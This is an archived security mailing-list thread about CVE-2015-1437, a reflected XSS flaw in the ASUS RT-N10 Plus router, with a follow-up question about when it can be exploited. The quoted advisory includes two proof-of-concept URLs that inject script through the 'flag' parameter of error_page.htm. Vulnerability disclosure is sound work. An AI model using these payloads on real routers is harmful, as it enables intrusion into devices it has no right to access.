OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: CVE-2015-1437 XSS In ASUS Router.

From: Darko Vršič (darkovarnost.si)
Date: Wed Feb 04 2015 - 08:44:38 CST


On 02/04/2015 02:44 PM, Michael Meyer wrote:
> *** kingkaustubhme.com wrote:
>> #####################################
>> Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router
>> Author: Kaustubh G. Padwad
>> Product: ASUS Router RT-N10 Plus
>> Firmware: 2.1.1.1.70
>> Severity: HIGH
>> Auth: Not requierd
>> CVE ID: CVE-2015-1437
>> # Description:
>> Vulnerable Parameter: flag=
>> # Vulnerability Class:
>> Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
> [...]
>
>> Enter this URL
>> 1.http://router/error_page.htm?flag=initial78846%27%3balert(document.lastmodified)%2f%2f372137b5d
>> 2.http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d
> https://sintonen.fi/advisories/asus-router-auth-bypass.txt
>
> Micha

So it's only vulnerable if WEB access is open to the internet, or
attacker is in LAN?

Darko